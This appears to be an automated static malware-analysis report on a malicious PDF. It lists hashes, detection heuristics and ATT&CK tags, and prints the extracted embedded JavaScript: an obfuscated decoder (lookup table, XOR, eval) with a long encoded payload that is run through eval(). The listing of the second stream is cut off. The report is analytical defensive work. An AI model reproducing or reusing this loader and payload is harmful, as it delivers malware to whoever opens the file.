Malicious PDF — malware analysis report

Static analysis result for SHA-256 f38098bc5705e660…

MALICIOUS

PDF

10.7 KB Created: 2008-07-26 19:43:58 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 5e939a2db8eb3eee416043ec4c0c229a SHA-1: 13e18dcd814a685f16f196469c82294821de99a6 SHA-256: f38098bc5705e6601f71d3afcfad37607befd4262caf273ba898cc7723e2b6cc
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.007 JavaScript

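The PDF contains embedded JavaScript, as indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests that eval() is used for obfuscation (PDF_EVAL does not appear among the four heuristics listed below; the eval() match shown on this page is reported under PDF_JS_EXPLOIT_CLUSTER). The extracted JavaScript object, javascript_obj0013_000.js, likely contains obfuscated code that attempts to download and execute a second-stage payload; this is inferred from the eval() call and the script-obfuscation indicators, which show that a decoded string is passed to eval() but do not by themselves show a download, so the second-stage behavior remains unconfirmed by this static result. Likewise, of the two ATT&CK techniques listed above, only T1059.007 (JavaScript) is directly backed by a finding on this page; no PowerShell indicator is shown. The authoring application, Scribus, is not inherently malicious, but the embedded script is highly suspicious.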

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    {vdhLM = "CDiePf";for(eval(""    + f2jHRySV9+""  +"iae3bea="+"" +  "M"/*eCCzyUxoiPzneIORpRdbl5n0AA5FwTYYgkYfFVTxuSlZl02aaeBLjyVt9a064hejRCOhisecLPB7ZCg0rrVaq1Tz*/+f2jHRySV9+  "a"+f2jHRySV9+   "t"+f2jHRySV9+    "h"+eHNZ4vWoLEKv8+eHNZ4vWoLEKv8+"."+f2jHRySV9+SvWLtYzat+f2jHRySV9+"i"+f2jHRySV9+"n(x4ei6BcgrX,XGbvEj2e25mCW)");iae3bea>o34FKYVq;iae3bea--,x4ei6BcgrX--){HgA1sml|=(aiw1tK[f2jHRySV9+z4Cq2[ eHNZ4vWoLEKv8+   ""+""+"c"+eHNZ4vWoLEKv8+"h"+eHNZ4vWoLEKv8+"a"+eHNZ4vWoLEKv8+"r"+eHNZ4vWoLEKv8+"C"+eHNZ4 …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_000.js pdf-javascript-stream PDF /JS object 13 at offset 0x336 9352 bytes
SHA-256: 0c87b612449b287fe3e36e730e25b6e1dac536c2aab9f7b117078a9a04bd4e88
Detection
ClamAV: No threats found
Obfuscation or payload: likely
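Carved artifact contains 2 eval/decoder/string-building token(s). 134 of 173 identifiers look randomly generated (e.g. 'yDtZRd_xATnuHgf5Qj_xua61p9epPa6RAwCBAz_u') — consistent with name-mangling obfuscation. Note that the quoted example occurs inside the encoded string literal in the preview below rather than as a declared name, so the identifier count likely includes fragments of the encoded data. Carved artifact contains 6 long base64-like blob(s).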
Preview script
First 1,000 lines of the extracted script
// Setup section of the carved /JS stream. The globals below are short string
// fragments that the script concatenates at runtime into property names, so
// names such as "fromCharCode" never appear as literals in the stream. For
// detection, the literal features that do survive are the eval( calls and the
// computed member accesses String[...] and Math[...].

// Assigned here and re-assigned the same value inside j3x97QH38BS; never read in this listing.
var vdhLM = "CDiePf";
// "m": the fourth letter of the name built into Sv3XQ and the first letter of "min" in the eval'd string.
var SvWLtYzat =  ""+  "m";
// "e": supplies the letter e in the "fromCharCode", "ceil" and "charCodeAt" names.
var f3ZDgztjAS = "e" +"";
// Not referenced by the visible code. NOTE(review): may be read by the decoded stage; unconfirmed.
var bbbbbz = "ent.wr";
// Two empty strings used purely as padding between fragments in later concatenations.
var eHNZ4vWoLEKv8 =   "",f2jHRySV9 =  "";

// "f": first letter of the name built into Sv3XQ.
var XZrKgW =       ""+/*K98xD41kTM*/  "f" ;
// Evaluates to the string "fromCharCode"; HXwlQiWZtFWt uses it as String[Sv3XQ].
var Sv3XQ = XZrKgW+  ""+eHNZ4vWoLEKv8+     ""+"r"  /*ttXHRWsK*/  +""+eHNZ4vWoLEKv8+ ""+ /*eMRb4QUn*/  "o" +eHNZ4vWoLEKv8+ ""+""+ SvWLtYzat  +  eHNZ4vWoLEKv8+    ""+    ""    +  "C" +eHNZ4vWoLEKv8+"h"+eHNZ4vWoLEKv8+""+ "a"+eHNZ4vWoLEKv8+   ""+    "r"+eHNZ4vWoLEKv8+"C"  +    "" +eHNZ4vWoLEKv8+"o"+eHNZ4vWoLEKv8+"d" +  "" +eHNZ4vWoLEKv8+f3ZDgztjAS +   ""    +"";

// Array whose first element is 1. The last statements of the script push the
// decoded string onto it and then pass the array to eval().
var BJeuy7 = new Array();
BJeuy7.push(1);

/**
 * Thin wrapper around String.fromCharCode, reached through the computed
 * property name held in the global Sv3XQ (which evaluates to "fromCharCode").
 * The decoder j3x97QH38BS calls it once per decoded byte.
 *
 * @param cPFA5A0ABXDFm Character code to convert.
 * @returns One-character string for that code.
 */
function HXwlQiWZtFWt(cPFA5A0ABXDFm){
// Filler local: assigned and never read.
var QO76W4JZ543RFQ = "BilJa6AyScZW";
// Computed member access hides the fromCharCode name from literal string matching.
var cvcccccc=    (String[Sv3XQ ](cPFA5A0ABXDFm));
// Filler local: assigned and never read.
var lJc2h = "ZDnPnr";
return (cvcccccc);


}


/**
 * Decoder for the encoded string literal passed in at the bottom of the script.
 *
 * Each input character is mapped to a value in 0..63 through the lookup table
 * aiw1tK (indexed by char code minus 48). The values are packed low-bits-first
 * into an accumulator; every completed 8 bits are XORed with 187 and appended
 * to the result through HXwlQiWZtFWt, so four input characters yield three
 * output characters. The input is walked in chunks of at most 1024 characters.
 *
 * @param z4Cq2 Encoded text (read via .length and charCodeAt).
 * @returns Decoded string; the caller pushes it onto BJeuy7, which is then passed to eval().
 */
function j3x97QH38BS(z4Cq2){
// Filler local: assigned and never read.
var xIjFcWyOqZT2X = "l8SfBmICU2J";
vdhLM = "CDiePf";
// o34FKYVq: constant 0 used as the loop bound and as the initial value of the counters.
// x4ei6BcgrX: characters still to process; XGbvEj2e25mCW: chunk size (1017+7 = 1024).
// iae3bea / UIkUvRLS: inner and outer loop counters; fi1AxkC: decoded output.
// pGOxnqANUDz0: read index; LR7Pv3rHUFW: current bit shift; HgA1sml: bit accumulator.
// aiw1tK: 75-entry table for char codes 48..122; the /*...*/ runs inside Array(...) are filler.
var o34FKYVq=0,
x4ei6BcgrX=z4Cq2.length,XGbvEj2e25mCW=1017+ 7,iae3bea,
UIkUvRLS,fi1AxkC=   "",pGOxnqANUDz0=o34FKYVq,LR7Pv3rHUFW=o34FKYVq,HgA1sml=o34FKYVq,aiw1tK=Array(/*WjVgDKyxabTYzK9TLfQynteyfwA0yUsmDNSQiRNI4rr4CzWXfxWSqAQV7bf56YrJvKkel9wozorBnOjTLFvCQLhWxNb4vTMrn7VYESNEGF*/63,0,30,29,48,9,34,17,4,61,0,0,0,0,0,0,58,2,16,52,28,12,51,8,54,7,6,14,25,46,23,35,62,47,11,19,24,42,43,49,55,21,26,0,0,0,0,36,0,56,38,45,60,33,53,13,20,5,57,31,1,37,44,3,10,22,32,59,50,27,15,40,18,39,41/*PeAX1PSCpouMlHypDRB6EIanX4BlJRCO6Mv6mO*/);


// "c": first letter of the "ceil" name assembled in the outer loop header.
var bhyt = "c";

// Outer loop: Math["ceil"](length / 1024) passes, one per chunk.
for(UIkUvRLS=Math[ ""+   f2jHRySV9+    bhyt + "" +f2jHRySV9+f3ZDgztjAS  +f2jHRySV9+     ""+"i"+f2jHRySV9 +"l"](x4ei6BcgrX/XGbvEj2e25mCW);UIkUvRLS>o34FKYVq;UIkUvRLS--)
// Inner loop: the initialiser is run through eval(); the concatenated string is
// "iae3bea=Math.min(x4ei6BcgrX,XGbvEj2e25mCW)". Because that string names the
// locals, the decoder only works with these exact identifiers.
// Body: look up z4Cq2["charCodeAt"](index) - 48 in aiw1tK and OR it into the
// accumulator at the current shift.
{vdhLM = "CDiePf";for(eval(""    + f2jHRySV9+""  +"iae3bea="+"" +  "M"/*eCCzyUxoiPzneIORpRdbl5n0AA5FwTYYgkYfFVTxuSlZl02aaeBLjyVt9a064hejRCOhisecLPB7ZCg0rrVaq1Tz*/+f2jHRySV9+  "a"+f2jHRySV9+   "t"+f2jHRySV9+    "h"+eHNZ4vWoLEKv8+eHNZ4vWoLEKv8+"."+f2jHRySV9+SvWLtYzat+f2jHRySV9+"i"+f2jHRySV9+"n(x4ei6BcgrX,XGbvEj2e25mCW)");iae3bea>o34FKYVq;iae3bea--,x4ei6BcgrX--){HgA1sml|=(aiw1tK[f2jHRySV9+z4Cq2[ eHNZ4vWoLEKv8+   ""+""+"c"+eHNZ4vWoLEKv8+"h"+eHNZ4vWoLEKv8+"a"+eHNZ4vWoLEKv8+"r"+eHNZ4vWoLEKv8+"C"+eHNZ4vWoLEKv8+"o"+eHNZ4vWoLEKv8+"d"+eHNZ4vWoLEKv8+f3ZDgztjAS+eHNZ4vWoLEKv8  +"A"+eHNZ4vWoLEKv8+"t"](pGOxnqANUDz0++)-48])<<LR7Pv3rHUFW;
// Non-zero shift: a full byte is available. 187^HgA1sml&255 parses as
// 187 ^ (HgA1sml & 255); the accumulator then drops 8 bits (5+3) and the shift
// drops by 2 (4-2). Zero shift: nothing is emitted and the shift restarts at 6 (4+2).
if(LR7Pv3rHUFW){fi1AxkC+=HXwlQiWZtFWt(187^HgA1sml/*K5dKjNlvmTde8GzXS67fmGXdl8UmbTMEY1YHOKDAnqpv8pSavZFhpmLbupNVJkkrlI00cMKQD0LKyoutNAbDxworm*/&/*O6x8wiQ7r3SCTfLo1KcuE16pD3m3tYFGdCOauogmr0yKoK0oemjtmoi1qU3k3H2gUP*/255);HgA1sml>>=5/*XEyB68AQvUZk0LT39Hk99FBsITtyxJGMXEXcLh4HBc2LyUN8m9FvNRofuher2uDY9lBU*/+3;LR7Pv3rHUFW-=4/*YlermzqHNx5VDzsenYZVCQW8e6GPGksVVWMHWCZtAdONdH3Rpbw33*/-2;
}else{LR7Pv3rHUFW=4+2;}}}

return(fi1AxkC);

}

BJeuy7.push(""+j3x97QH38BS(   /*BgZP6p0yLeUhw1uWu60ISnZVEP7BR9fapE1v40tOoO7lO*/ "" /*yJ7QcZEC5SbBe3KJd0Xd6anyzcM7Nl8e5E6hnJtsmU4QXNjBXGpcrcbrF*/ +"WHnH5QzH5yn4uZabYsgFuUkt5Vc4Sp5rWHcFYO9FxS3fuHcCoSMCvvz4ZyEtRkjbNs3fxJR4uJVnEvcCNs9bSpnH5OdtY2cXYF9FSIL6I2cXYR54AV3tGQdbBZabAV3tGQErJQLntpnH5OdtuZabAV3tGQDmGsDHG0DtxNgXSMamNs3fhbw_1JVn5s9FKyDfupnH5Odt1MLnJRuntHnH5QLF2yEtxS3fuZabZQdtYHnC2FnX5XMX5OnChNgrWp3XuKLF2yEtxS3fuqabopjbWADntHnH5QjtZRdfhV9XuZabKNcXGOcHRs9_L@zFaQG6G@zFobkOv@zFGMaOR@zFR6vOo@zFvMarjszFob06aszFp6vOR@zFobQP0szFRKwOo@zFRpw0jszFvMarjszFoPv6v@zFE60OR@zFKKarjszFgUv6aszFKU0Ov@zFPya0p@zFPyT6jszFPO0rjszFvHQ0jszFKbwO@szFPV0rG@zFopwOg@zFRPwOK@zFKtwOg@zFE6arjszFobv6aszFG6GOv@zFR6GOo@zFKHT0G@zFEHarjszFR6T6R@zFG6T0G@zFvpGPA@zFvUwOR@zFG6wP0szFGHT09szFjs069szFR6w6v@zF9yG6o@zFRKGOv@zFaXvPp@zFR6a60szFvMT0@szFPXQ0jszFGbQOo@zFE@T0o@zFK@Q0K@zFvHarjszFR6T6v@zFgHGPG@zFR60rjszFob0Oo@zFp6QOg@zF0Oa6G@zFRParjszFR6ar@szFKHvPG@zFKMwOPszFoPvPG@zFRKGO0szFKbwOE@zFG6TPo@zFoUvP@szFPvwOjszF9XQP5@zF9Xk09szFaQG65@zF9FarjszF@sk05@zFjvaO9szF5@kOK@zFEKTOK@zFgHwPjszFgHwro@zFG6wPjszFjvGPR@zFgPTOp@zFRMa6R@zFgKwOR@zFgKwOv@zFg@GO5@zF5PG6K@zFgpw6aszFKMGOv@zFK6wOv@zF@VkPo@zFRPk0aszF9XvOaszFRPwOK@zF9varjszFa0arG@zFjQa6aszFoUkOaszFAKw0R@zFgKwOR@zFg@kO9szFgPT6PszFE@TOo@zFg6vO5@zFKPTO0szFo@kPo@zFR@0OPszF9XQ0aszFRPwOK@zFKMwrG@zFaQG6G@zFKMwOR@zFobQOg@zFRPwOK@zFayarG@zFo6GO9szFv6vP5@zFKMwO5@zFGHTPo@zF5HQ6@szF9XvOR@zFRPwOK@zFKtwOjszFjvwOg@zF9sQro@zFR@0r@szFK@T09szFgU06v@zF9X06R@zFgKa0E@zFEPGOv@zFGUvOR@zF5Hk69szFgpTO0szFEbTOG@zF5@kO9szFg@TOv@zFEMTOK@zFgHkOg@zFgHvOv@zFg@T6PszF5HvOK@zFgHkOG@zFg@vOK@zFg@GOv@zF5HvO5@zFgPkOA@zF5@kOE@zFgKGOR@zFGHvOR@zFgUGOR@zFg@TOE@zFG6G60szFEMG69szFgtTOp@zFGPkOK@zFRMG6Kbz_1JVnYS9tuZabKNcXGOcHRs9_L@zFRU06@szFRU06@szFRU06@szFRU06@yz_WpsC2V9tLkgfTo9bJMLfhQdbBMjtZRdfhV9X1JVnLRgXLkgfTo9bJMzFYsgtTV9t2vLb2@d6@QwP2@d6@QwPLp5rWpsC2V9X2yEtxInXuZab5MGrWpRtRynHAQzeuKcXZ0cX5OnClsg_SscHRy9fhOgCY2cXYF9FSoTnttdCxkcXuKLHxF3HNSgHBNjf2NgXvv9eGQDtZRn_ubcCDy9fhOgCBZTHxF3HNSgHBoTntHcCNk3HNSgHBQzeubcCD
y9fhOgCY6nFLOdF5R3fDvj6NM5tRynHAR5rWpuHNSgHBQzeubcCDy9fhOgCY6nFLOdF5R3fDvj6NMLHxF3HNSgHBNjf2NgXvvcmGQDtZRn_1JVnEvcCNs9_LkgfTo3mNs3fD0dCB6dt5Vc4u2abRKdORMa6RpjbLkgfTo9bJMLHNSgHBoLHNSgHBoLXxk9fLkgfTogrWpVf2u9bJMLf2Fdb@yDtZRd_xATnuHgf5Qj_xua61p9epPa6RAwCBAz_uZcXqoMCbQzeub9fhOgCuAjbSscHRy9fhOgC1JVngV3tuqcFqQzeupV65pwrApwrApwrApwrApwrApwrAKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroKaroATnt@dFxk3mRynCY0DXSbzyv@a6RMTXL2LfKuc_1JVWWJVC3Qj_gs3tGRgfYQjeuKw_WADntHnH5QzHk0gCBQzeu@Df2OEHZQnXSbzyKO06G6wyKvTPgPwyKOa6vMwyKQGPEKwyK0a6obQyKvTPR6QyKVGPEMwyKvTP@0QyKQarKKwyKQwrPyQyK0a6obQyKva0GPwyKFGPvMwyKsarobQyKXwPG6QyKswPvPwyKsk60VwyKsk65bQyKsvPobQyK0T0PyQyKsT6KUQyKsQPo6wyKvwrKHwyKQaOK@wyKsGOKHwyKFG6obQyKvTPG6QyKOG6EPwyKQG6EKwyKsTO9OwyKFTOobQyKQG65MwyKOG69OwyK0wraRwyK0w6KMwyKOG6@0QyKOTO9XQyKyQ0RHQyKQG6pPwyKXk6GKwyKQarEPwyKOk0aVwyKQG6RPQyK0a69VQyKsk0PyQyKOTPKKwyKFwO9vwyKsw0PswyK0TOobQyKQG65PwyKXTOaOwyKQGPobQyKvTPvKwyKVGPKHwyK0v6R6wyKQaOobQyKQG6oUQyKsT0aOwyKsa6K@QyKva0aOwyKQarEPQyKsT6KtwyKOG6jvwyKvwPaVQyKs0rKbQyKXk0@ywyKXk09XQyKO06GbwyKXvOobQyKVQ09ywyKy0rvHQyKyw0g@wyKFarg@wyKXTO@yQyKXTOAKwyKOG6@yQyKy0raQwyKXaOgUwyKQa6RMwyKXarKMwyKXarKPwyKXwOEbwyKyaOG@wyKXwrp6QyKsa6EPwyKsG6KPwyKVQPjvwyKQa09OQyKXk0E6QyKQaOK@wyKX0robQyKO0Oo6wyKy06R6QyKvwPg6QyKRarPQwyKXarKMwyKXw0gHQyKXaO5@QyKFwOgKwyKXGPEbwyKsaOgPQyKvw0jvwyKQw0v@QyKXk0POQyKQaOK@wyKsa6A6wyKO06G6wyKsa6KMwyKvTPKHwyKQaOK@wyKOk6o6wyKvG6EHQyK0GPaywyKsa6KbwyKOTOjvwyKyT0pUQyKXk0EMwyKQaOK@wyKsGOKbQyKy0rKHwyKXQ0AKwyKQw0oUQyKswO9XQyKXwPRPwyKXk0RMwyKXar0FwyKFaOEPwyKOwPEMwyKyT05HQyKXwrgPQyKFT6g6wyKyw0gHQyKXwOgPwyKFa6g@wyKXT0gHwyKXT0EPwyKXwO5@QyKyT0E@wyKXT0g6wyKXw0E@wyKXwOEPwyKyT0EbwyKXa0gpwyKyw0gtwyKXarEMwyKOT0EMwyKXw6EMwyKXwOgtwyKOG6GPQyK
Fa6GHQyKXGOgUwyKOa0g@wyKQa6G@TbxATntHnH5Qzf2ugjZyDtZRdbJMLf2Fdb@yDtZRd_xATntHnH5Q5HTQzeuMa4R696TQGHR6grWpuFZydbZ09X5QzeuMa4vMa6RMa61JVngV3tu6EH_kcXYQzeuU9XkogCY2cXYF9FSQL_ubGrWpuFZydbNs3fuZabZ09X5QzmuK5tTSPf2Ng_RKE6op5rWpuFZydbAV3tGQdbJMzFYsgtTV9t2vLb2@nrRpa62@nrRpa6Lp5rWpV4ZyEtRQzeuHcCoSMCvvz4ZyEtRkjbNs3fxATntHnH5Q5HhsDfvyabJMj_TO9bqMj6o0a6RMa6Rp5mZ09X5oTn3S3tuKLFZydbTScFY0neRAGHhsDfvkGHhsDfvyGrTScFY0E_BpLn1IsbuMjbqscf_V3t5Vc4rOgfKN9FbQzeupnH5OdtuAjbZ09XBogrWZDntHnH5Q5fgs3t3kgfEQzeu@Df2OEHZQnXSbzyKQGHR6cyKQGHR63bxATnttdCxkcXSx3F2yDXNSgFY2cXYF9FSQjeuPaOA@T6xM5fgs3t3kgfEQ5_JM5fgs3t3kgfEoTntPdCxODmTS9fNV3Hw0Ef5s9bJM5Phk9fZy3mTS9fNsgHvsQfZR9ftN3Xhv54GsDH7IabLbjmqOEXlM5fgs3t3kgfEun_1JVWWJVC3Qj_gs3tGRgfYQjeupTmppznWpR4Wp3XuKzHRQDmkSgHY6vfNkcHLN5X20ndTS3fxADnuMjbuMLFZydbgXdt20dCAV9bJ@Df2OEHZQnXSbzyKO06G6wyKvTPgPwyKOa6vMwyKQGPEKwyK0a6obQyKvTPR6QyKVGPEMwyKvTP@0QyKQarKKwyKQwrPyQyK0a6obQyKva0GPwyKFGPvMwyKsarobQyKXwPG6QyKswPvPwyKsk60VwyKsk65bQyKsvPobQyK0T0PyQyKsT6KUQyKsQPo6wyKvwrKHwyKQaOK@wyKsGOKHwyKFG6obQyKvTPG6QyKOG6EPwyKQG6EKwyKsTO9OwyKFTOobQyKQG65MwyKOG69OwyK0wraRwyK0w6KMwyKOG6@0QyKOTO9XQyKyQ0RHQyKQG6pPwyKXk6GKwyKQarEPwyKOk0aVwyKQG6RPQyK0a69VQyKsk0PyQyKOTPKKwyKFwO9vwyKsw0PswyK0TOobQyKQG65PwyKXTOaOwyKQGPobQyKvTPvKwyKVGPKHwyK0v6R6wyKQaOobQyKQG6oUQyKsT0aOwyKsa6K@QyKva0aOwyKQarEPQyKsT6KtwyKOG6jvwyKvwPaVQyKs0rKbQyKXk0@ywyKXk09XQyKO06GbwyKXvOobQyKVQ09ywyKy0rvHQyKyw0g@wyKFarg@wyKXTO@yQyKXTOAKwyKOG6@yQyKy0raQwyKXaOgUwyKQa6RMwyKXarKMwyKXarKPwyKXwOEbwyKyaOG@wyKXwrp6QyKsa6EPwyKsG6KPwyKVQPjvwyKQa09OQyKXk0E6QyKQaOK@wyKX0robQyKO0Oo6wyKy06R6QyKvwPg6QyKRarPQwyKXarKMwyKXw0gHQyKXaO5@QyKFwOgKwyKXGPEbwyKsaOgPQyKvw0jvwyKQw0v@QyKXk0POQyKQaOK@wyKsa6A6wyKO06G6wyKsa6KMwyKvTPKHwyKQaOK@wyKOk6o6wyKvG6EHQyK0GPaywyKsa6KbwyKOTOjvwyKyT0pUQyKXk0EMwyKQaOK@wyKsGOKbQyKy0rKHwyKXQ0AKwyKQw0oUQyKswO9XQyKXwPRPwyKXk0RMwyKXar0FwyKFaOEPwyKOwPEMwyKyT05HQyKXwrgPQyKFT6g6wyKyw0gHQyKXwOgPwyKFa6g@wyKXT0gHwyKXT0EPwyKXwO5@QyKyT0E@wyKXT0g6wyKXw0E@wyKXwOEPwyKyT0EbwyKXa0gpwyKyw0gtwyKXarEMwyKOT0EMwyKXw6EMwyKXwOgtwyKOG6GPQyKFa6G
HQyKXGOgUwyKOa0g@wyKQa6G@TbxATntMLFZydbSFMtKMa6aN0bJMLFgQnXvvc4ZNjf2NgXvv9b7ML61JVnuHnH5Qjf2N9bJMj6o0a6RMa6RMzmuKjCnVnORMGPfQ5_uMa4GKw_1JVnuHnH5Qz4ZyEtRQzeu@Df2OEHZQnXSbzyKRa6AMwyKRa6AMTbxATntMz4ZyEtRQzeuHcCoSMCvvz4ZyEtRkjbNs3fxATntMLFZydbRswP7okOKH9bJMj_RKd6TQGHR696TQzmuMa4vMa6RMa6xM5muMa4vMa6RMa61JsbuMjbuHgf5Qj_gV3tuHntTVP0AHw4uZabRAabgVEHU0QrgpdbIMjtKUkC4XwO3oabgVEHU0QrgpdbBAjbxADnuMjbuMzH5yn4rXntTVP0AHw4bQzeupnH5OdtuAjbgXdt20dCAVgrJIsbuMjbuHnH5QjFMu0Cfyg0EQzeu@Df2OEHZQnXSbzyRpTbxATnuMjbuM5FSR9f2Qj_vsM9SNkHdFDmNs3fD0dCu2abRKdORMa6xPnsHv39LFvFuAzeuPnsHv39LFvF1JsbuMjbuPnsHv39LFvFuZabLqkmLM5_uPnsHv39LFvF1JVnuU9tRNjXhO3maS9fNV3HYtcXvRvHhN9_vsM9SNkHdFn_1JVnJIVnJo"  +      ""));eval(BJeuy7);
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x358 10058 bytes
SHA-256: 4259111919fea68b7931470de169dcba4e5887480db6021d028cfeafc7e1dea2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
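Carved artifact contains 2 eval/decoder/string-building token(s). 135 of 187 identifiers look randomly generated (e.g. 'yDtZRd_xATnuHgf5Qj_xua61p9epPa6RAwCBAz_u') — consistent with name-mangling obfuscation. Note that the quoted example occurs inside the encoded string literal in the preview below rather than as a declared name, so the identifier count likely includes fragments of the encoded data. Carved artifact contains 6 long base64-like blob(s).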
Preview script
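First 1,000 lines of the extracted script (this carve runs past the stream's endstream marker, so the listing ends with PDF objects, the xref table and the trailer rather than JavaScript)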
// Setup section of the carved /JS stream. The globals below are short string
// fragments that the script concatenates at runtime into property names, so
// names such as "fromCharCode" never appear as literals in the stream. For
// detection, the literal features that do survive are the eval( calls and the
// computed member accesses String[...] and Math[...].

// Assigned here and re-assigned the same value inside j3x97QH38BS; never read in this listing.
var vdhLM = "CDiePf";
// "m": the fourth letter of the name built into Sv3XQ and the first letter of "min" in the eval'd string.
var SvWLtYzat =  ""+  "m";
// "e": supplies the letter e in the "fromCharCode", "ceil" and "charCodeAt" names.
var f3ZDgztjAS = "e" +"";
// Not referenced by the visible code. NOTE(review): may be read by the decoded stage; unconfirmed.
var bbbbbz = "ent.wr";
// Two empty strings used purely as padding between fragments in later concatenations.
var eHNZ4vWoLEKv8 =   "",f2jHRySV9 =  "";

// "f": first letter of the name built into Sv3XQ.
var XZrKgW =       ""+/*K98xD41kTM*/  "f" ;
// Evaluates to the string "fromCharCode"; HXwlQiWZtFWt uses it as String[Sv3XQ].
var Sv3XQ = XZrKgW+  ""+eHNZ4vWoLEKv8+     ""+"r"  /*ttXHRWsK*/  +""+eHNZ4vWoLEKv8+ ""+ /*eMRb4QUn*/  "o" +eHNZ4vWoLEKv8+ ""+""+ SvWLtYzat  +  eHNZ4vWoLEKv8+    ""+    ""    +  "C" +eHNZ4vWoLEKv8+"h"+eHNZ4vWoLEKv8+""+ "a"+eHNZ4vWoLEKv8+   ""+    "r"+eHNZ4vWoLEKv8+"C"  +    "" +eHNZ4vWoLEKv8+"o"+eHNZ4vWoLEKv8+"d" +  "" +eHNZ4vWoLEKv8+f3ZDgztjAS +   ""    +"";

// Array whose first element is 1. The last statements of the script push the
// decoded string onto it and then pass the array to eval().
var BJeuy7 = new Array();
BJeuy7.push(1);

/**
 * Thin wrapper around String.fromCharCode, reached through the computed
 * property name held in the global Sv3XQ (which evaluates to "fromCharCode").
 * The decoder j3x97QH38BS calls it once per decoded byte.
 *
 * @param cPFA5A0ABXDFm Character code to convert.
 * @returns One-character string for that code.
 */
function HXwlQiWZtFWt(cPFA5A0ABXDFm){
// Filler local: assigned and never read.
var QO76W4JZ543RFQ = "BilJa6AyScZW";
// Computed member access hides the fromCharCode name from literal string matching.
var cvcccccc=    (String[Sv3XQ ](cPFA5A0ABXDFm));
// Filler local: assigned and never read.
var lJc2h = "ZDnPnr";
return (cvcccccc);


}


/**
 * Decoder for the encoded string literal passed in at the bottom of the script.
 *
 * Each input character is mapped to a value in 0..63 through the lookup table
 * aiw1tK (indexed by char code minus 48). The values are packed low-bits-first
 * into an accumulator; every completed 8 bits are XORed with 187 and appended
 * to the result through HXwlQiWZtFWt, so four input characters yield three
 * output characters. The input is walked in chunks of at most 1024 characters.
 *
 * @param z4Cq2 Encoded text (read via .length and charCodeAt).
 * @returns Decoded string; the caller pushes it onto BJeuy7, which is then passed to eval().
 */
function j3x97QH38BS(z4Cq2){
// Filler local: assigned and never read.
var xIjFcWyOqZT2X = "l8SfBmICU2J";
vdhLM = "CDiePf";
// o34FKYVq: constant 0 used as the loop bound and as the initial value of the counters.
// x4ei6BcgrX: characters still to process; XGbvEj2e25mCW: chunk size (1017+7 = 1024).
// iae3bea / UIkUvRLS: inner and outer loop counters; fi1AxkC: decoded output.
// pGOxnqANUDz0: read index; LR7Pv3rHUFW: current bit shift; HgA1sml: bit accumulator.
// aiw1tK: 75-entry table for char codes 48..122; the /*...*/ runs inside Array(...) are filler.
var o34FKYVq=0,
x4ei6BcgrX=z4Cq2.length,XGbvEj2e25mCW=1017+ 7,iae3bea,
UIkUvRLS,fi1AxkC=   "",pGOxnqANUDz0=o34FKYVq,LR7Pv3rHUFW=o34FKYVq,HgA1sml=o34FKYVq,aiw1tK=Array(/*WjVgDKyxabTYzK9TLfQynteyfwA0yUsmDNSQiRNI4rr4CzWXfxWSqAQV7bf56YrJvKkel9wozorBnOjTLFvCQLhWxNb4vTMrn7VYESNEGF*/63,0,30,29,48,9,34,17,4,61,0,0,0,0,0,0,58,2,16,52,28,12,51,8,54,7,6,14,25,46,23,35,62,47,11,19,24,42,43,49,55,21,26,0,0,0,0,36,0,56,38,45,60,33,53,13,20,5,57,31,1,37,44,3,10,22,32,59,50,27,15,40,18,39,41/*PeAX1PSCpouMlHypDRB6EIanX4BlJRCO6Mv6mO*/);


// "c": first letter of the "ceil" name assembled in the outer loop header.
var bhyt = "c";

// Outer loop: Math["ceil"](length / 1024) passes, one per chunk.
for(UIkUvRLS=Math[ ""+   f2jHRySV9+    bhyt + "" +f2jHRySV9+f3ZDgztjAS  +f2jHRySV9+     ""+"i"+f2jHRySV9 +"l"](x4ei6BcgrX/XGbvEj2e25mCW);UIkUvRLS>o34FKYVq;UIkUvRLS--)
// Inner loop: the initialiser is run through eval(); the concatenated string is
// "iae3bea=Math.min(x4ei6BcgrX,XGbvEj2e25mCW)". Because that string names the
// locals, the decoder only works with these exact identifiers.
// Body: look up z4Cq2["charCodeAt"](index) - 48 in aiw1tK and OR it into the
// accumulator at the current shift.
